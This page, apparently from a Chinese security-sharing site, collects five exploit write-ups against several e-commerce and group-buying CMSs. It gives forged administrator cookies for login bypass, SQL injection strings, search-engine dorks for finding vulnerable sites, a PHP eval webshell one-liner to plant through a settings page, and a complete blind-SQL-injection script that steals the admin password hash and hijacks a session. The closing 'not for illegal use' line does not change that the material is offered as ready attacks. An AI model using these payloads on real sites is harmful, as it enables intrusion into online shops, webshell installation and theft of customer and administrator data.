凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用
“四不空小尼姑”通过精心收集,向本站投稿了5篇凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用,下面就是小编给大家带来的凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用,希望大家喜欢,可以帮助到有需要的朋友!
篇1:凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用
ad_chk.asp判断管理员登陆状态
<%
if Request.Cookies(“venshop”)(“admin_name”)=“” or Request.Cookies(“venshop”)(“admin_pass”)=“” or Request.Cookies(“venshop”)(“admin_class”)=“” then
Response.Cookies(“venshop”)(“admin_name”)=“”
Response.Cookies(“venshop”)(“admin_pass”)=“”
Response.Cookies(“venshop”)(“admin_class”)=“”
response.redirect “ad_login.asp”
response.end
end if
%>
判断admin_class
C:\Inetpub\wwwroot>findstr /i /n /s “admin_class” *.asp
ad_admin.asp:29: rs(“admin_class”)=request(“class1”)
ad_admin.asp:43:rs(“admin_class”)=request(“class”)
ad_admin.asp:92:<%if rs(“admin_class”)=0 then response.write“ s
elected”%>>总管理员
ad_admin.asp:93:<%if rs(“admin_class”)=1 then response.write“ s
elected”%>>产品管理
ad_admin.asp:94:<%if rs(“admin_class”)=2 then response.write“ s
elected”%>>订单管理
........................
可以看出当admin_class=0的时候就是总管理员身份了,
凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用
,
伪造cookie如下
Themes=default; Count=lao=3; Countecho=lao=True; ASPSESSIONIDQAADRSRB=CDBDHEHCLJOIHFDAHLFHABIO; venshop=admin%5Fclass=0&admin%5Fpass=admin&admin%5Fname=admin
然后访问即可,后台有数据库备份可以拿webshell。
google :inurl:“views.asp?hw_id=”
篇2:凡人网络购物系统Jsp版漏洞分析
凡人网络购物系统Jsp版是网上少见的JSP开源的程序,说实话JSP的程序确实很少,
这套系统已经 被很多人改过了,所以只能用文件来试是不是这个系统,..数据库是ACCESS难得,以前学校写都是用SQL..所以JDBC那里很熟悉
这文章也没有投稿的价值.. 俺还有更好的文章投稿,所以这个就发出来玩了,代码漏洞百出。看的我都想吐了 有兴趣的朋友自己去下一份最新版的来看
正文:
现在虽然渗透的方法多彩多样,但是最具威胁最简单的还是injection攻击. 对于 injection漏洞的形成无非就是某某变量
没过滤或者过滤不严而已..
这几天一直在看凡人网络购物系统Jsp版的代码。 多少看出来点问题。这里共享下..
这套系统网上使用的并不是很多,但是大部分人喜欢改这套程序来用,所以我只是在笔记本上装了个tomcat环境来测试一下这个漏洞
因为不投稿所以也没截图 只把漏洞代码简单说下
首先看一下就简单的JSP注射漏洞的形成,我从我们教材上随便找了一个后台登陆的代码来分析
现在的学校培训程序员只知道让写代码。对编码安全根本没有意识...
教材上的后台代码:
Statement stmt = conn.createStatement;
string checkUser = “select * from login where username =' ”+userName + “' and userpassword ='”+userPassword + “ ' ”;
ResultSet rs = stmt.executeQuery(checkUser); //执行查询
if(rs.next())
response.sendRedirect(“SuccessLogin.jsp”);
else
response,sendRedirect(“FailureLogin.jsp”);
上边是一个正常的JSP登陆页面 . 但是userName跟userPassword都没有过滤直接就放到数据库中进行查询,存在典型的注射漏洞
如果我们知道数据库里有个admin的用户 那么我们就可以用or'a'='a 或者 'or1=1/*进行登陆而不用输入密码登陆。
现在我们来看看凡人网络购物系统Jsp版的登陆页面login.jsp..代码如下,
<%@ page contentType=“text/html;charset=GBK” language=“java” import=“java.sql.*,java.util.Date” errorPage=“” %>
<%
boolean foundeer=false;
String user_name,user_pass;
if(!foundeer){
if (session.getAttribute(“user_name”)==null){ //只判断是否为空,并未进行过滤
user_name=request.getParameter(“user_name”);
user_pass=request.getParameter(“user_pass”);
if(user_name==null || user_pass==null){
out.print(“用户名和用户密码不能为空!”);
foundeer=true;
}
String sql=“select * from member where user_name='”+user_name+“'”;
ResultSet rs;
rs=mdb.executeQuery(sql);
以下省略
...
}
我们从
if (session.getAttribute(“user_name”)==null){
user_name=request.getParameter(“user_name”);
user_pass=request.getParameter(“user_pass”);
if(user_name==null || user_pass==null){
out.print(“用户名和用户密码不能为空!”);
foundeer=true;
}
String sql=“select * from member where user_name='”+user_name+“'”;
ResultSet rs;
rs=mdb.executeQuery(sql);
这里可以看到, 只判断了user_name是否为空,并没有进行有效的过滤,导致注射漏洞的发生,如果让select成功,就能成功饶过验证. 算是一个典型的or 注入
先用or 1=1和or 1=2来测试是否存在注入点,我在本地测试是成功的..在本本上我没法截图 然后继续 or exists(select XX from XX)返回or 1=1的页面,这里没什么可说的... 不懂的可以去看鸡头的那个新or 注入 讲 的很明白的...
其实这太系统简直是漏洞百出,还一个跨站的漏洞,在留言那里限制是10个字符,
但是我们可以本地写个表单来提交就可以成功跨站的,代码我就不发了。 稍微懂点JSP的都能看出来。
篇3:正版逍遥网店系统 V3.0 COOKIE欺骗漏洞漏洞预警
OK开始,这是一个网店,本来我想先找注入,貌似注入都过滤了,于是我又来到后台,看了下检测文件,悲剧由此产生:
漏洞文件:checkadmin.asp
<%
if request.cookies(“buyok”)(“admin”)=“” then response.write “
%>
大家看到这里一定以为很简单吧,呵呵 直接COOKIE欺骗就可以进后台,如果真的这样我就不发了~!留个悬念让大家去试试。
然后我进入后台,127.0.0.1/admin/index.asp.自动跟我弹了回来。我当时就郁闷了。继续看代码。
index.asp
网店后台管理
此网页使用了框架,但您的浏览器不支持框架,
看到这里我奇怪了,是调用checkadmin.asp啊 为什么进不了后台。我看到了main.asp。
继续跟进。代码就不发了免得多,最后发现了一个文件。
漏洞文件:include\buyok_functions.asp
下面贴出部分代码:
set rscheck=conn.execute(“select * from buyok_user where UserId='”&request.cookies(“buyok”)(“userid”)&“'”)
if rscheck.eof and rscheck.bof then
response.write “”
response.end
看到这里大家都懂了吧 呵呵~!
OK附上EXP:
KHWJCNQIVQNSXKMKKYHP=GVPLGBWIQTXZICBWSAALROKUCZBJDYHJMYPDEMHE; buyok=userid=1&temp=login&admin=admin;
修改COOKIE 然后直接进入127.0.0.1/admin/index.asp.
后台:localhost/admin/login.asp
作者:风之传说
篇4:淘客帝国系统后台cookie欺骗漏洞及后台拿shell漏洞预警
偶然发现的淘客帝国免费版的后台可以cookie欺骗
工具: 老兵的cookie'欺骗工具
关键字: 分类- 商城- 品牌- 女人- 男人- 美容- 鞋包- 数码- 居家- 食品
首先打开工具把cookie改为 COOKIEadminuser=admin; DedeUserID=1; PHPSESSID=11111 ,然后再工具的地址栏那里输入网站的后台(默认后台/admin)等页面全部出来后再在后台目录后加上manage.php 跳转就可以进入后台了,进入后台后怎么样拿shell就简单了,这里就不说了..
补下代码【anfli 补】
getshell 简单 系统配置 {${@eval($_POST['cmd'])}} 一句话连接地址/data/configdata.php
顺便补一下代码===================|The End}
##admin目录下php 部验证##
--------------------main.php
require_once '../include/adminfunction.php';
checkadmin;
---------------------/include/sysfunction.php
#####
function checkadmin(){
global $COOKIEadminuser;
global $sitetitleurl;
//判断
if( (isset($_COOKIE['COOKIEadminuser']) && $_COOKIE['COOKIEadminuser']!=“”) || (isset($_SESSION['adminuser']) && $_SESSION['adminuser']!=“”) ){
} else {
echo(“”);
exit;
}
一看就懂
$_COOKIE['COOKIEadminuser']!=“” 只要不为空就ok
//index.php 一看到这里就知道 程序员自己催眠了自己 登出就把adminuser 清空 .........COOKIEadminuser是干神马的?
/admin/index.php 是不会通过验证 但是如果访问/admin/manage.php 的话一样ok 也就lz所谓的偶然发现了 COOKIEadminuser 并没有空
if($action==“loginout”){
$_SESSION['adminuser'] = “”;
SetCookie(“adminuser”, “”);
redirect_to($sitetitleurl);
其实所有审计过程 是倒序
篇5:最土团购系统盲注及cookie欺骗漏洞漏洞预警
最土团购系统是国内著名团购程序,在国内团购系统份额中所占比例很大,但因有些版本某些地方过滤不完全导致注射漏洞(非通杀)。
查找方式
powered by zuitu
漏洞分析
1.注入漏洞
首先看一下全局核心文件app.php代码:
管理员 $login_user = Table::Fetch('user', $login_user_id);追踪GetLoginId方法:static public function GetLoginId() { $user_id = abs(intval(Session::Get('user_id'))); if (!$user_id) { $u = ZUser::GetLoginCookie(self::$cookie_name); //调用cookie $user_id = abs(intval($u['id'])); } if ($user_id) self::Login($user_id); return $user_id; } static public function GetLoginCookie($cname='ru') { $cv = cookieget($cname); //获取cookie值 if ($cv) { $zone = base64_decode($cv); //对cookie值base64解密 $p = explode('@', $zone, 2); //用@分隔成数组 return DB::GetTableRow('user', array( //进入user表查询 'id' =>$p[0], //第一部分为id,默认超级管理员id为1 'password' =>$p[1], //第二部分为加密后的密码hash )); } return Array(); } /*cookie获得方式*/ function cookieget($k, $default='') { $pre = substr(md5($_SERVER['HTTP_HOST']),0,4); $k = “{$pre}_{$k}”; return isset($_COOKIE[$k]) ? strval($_COOKIE[$k]) : $default; }
真正用到的参数是id,password的hash。密码学告诉我们解密的关键是密钥,而不是算法,那通过注入我们掌握了id和password直接cookie欺骗,以管理员身份登录。由于后台需要二次登录,所以思路是我们在前台用超级管理员欺骗登陆后,pass掉管理员密码,登录后台。说了很多废话,整合两个漏洞,最后上exp:
< 3) { print_r(' -------------------------------------------------------+ Example: php.exe exp.php localhost password --l4yn3 -------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; //域名 $param = $argv[2]; //注入字段 username or password $res = ''; for($i=1;$i<=32;$i++) { $find_str = blindExp($i); if($find_str == '~')break; echo “The $i word: $find_str\n”; $res .= $find_str; } if(empty($res)) { print('Exploited failed!'); exit; } print_r(“ The $param is $res\n I'm trying to login the website,wait...... ”); $session_id = sharpLogin($argv[1], $res); print_r(' Login completely! The PHPSESSID is '.$session_id.'! Please copy the command \'javascript.:alert(document.cookie=\'PHPSESSID='.$session_id.'\');\' to the widow which the '.$host.' is opened, then reload the window! Good Luck! ----l4yn3 '); exit; /*信息刺探*/ function getData($i, $count) { global $host, $param; $url = “$host/ajax/coupon.php?action=consume&id=--9876')%20or%20exists(select%20*%20from%20user%20where%20manager='Y'%20and%20ord(substring($param,$i,1))>$count%20and%20id=1%20order%20by%20id%20desc%20limit%201)--%20sdf”; //14561 $remove_data = @file_get_contents($url); if(!strstr($remove_data, '--9876')) { return 1; } return 0; } /*账号和密码猜解*/ function blindExp($pos) { $counter_min = 20; $counter_max = 128; $counter_middel = 0; $res = ''; $i = 0; while($i <=10) { $counter_middel = ($counter_max + $counter_min) / 2; $res = getData($pos, $counter_middel); if(empty($res)) { $counter_max = floor($counter_middel); } else { $counter_min = ceil($counter_middel); } if($counter_max == $counter_min && $counter_max != 20) { $res = chr($counter_max); break; } $i++; } return preg_match('/[\d\S]/', $res) ? $res : '~'; } /*伪造cookie*/ function sharpLogin($host = '', $password = '') { $time = time() + 3600 * 24 *30; $key = substr(md5($host), 0, 4); $cookie_key = $key.“_ru”; $cookie_val = base64_encode('1@'.$password
); $data = ''; $data .= “GET /index.php HTTP/1.1\r\n”; $data .= “Host: $host\r\n”; $data .= “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n”; $data .= “Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n”; $data .= “Cookie: {$cookie_key}_city=1; cnzz_a2262318=3; sin2262318=; rtime=0; ltime=$time; cnzz_eid=19056328-1285688892-; $cookie_key=$cookie_val\r\n”; $data .= “Connection: Close\r\n\r\n”; $fp = fsockopen($host, 80); fputs($fp, $data); $res = ''; while($fp && !feof($fp)) { $res .= fread($fp, 1024); } fclose($fp); $session_id = getSessionId($res); if($session_id)return $session_id; else return false; } /*获取sessionid*/ function getSessionId($data) { preg_match(“/PHPSESSID=([\d\w]+);/iU”, $data, $match); if(isset($match[1])) { return $match[1]; } return ''; }exp返回如下代码:
The PHPSESSID is 9fb4dff8d28c07aa4e2a6ea67f7ed2ab! Please copy the command 'javascript.:alert(document.cookie='PHPSESSID=9fb4dff8d28c07aa4e2a6ea67f7ed2ab'); ' to the widow which the www.abc.com is opened, then reload the window!拷贝'javascript.:alert(document.cookie='PHPSESSID=9fb4dff8d28c07aa4e2a6ea67f7ed2ab');到打开当前网站的浏览器窗口输入栏,回车,刷新,即登录成功,
请勿用于非法用途,仅用于技术交流。
【凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞利用】相关文章:
文档为doc格式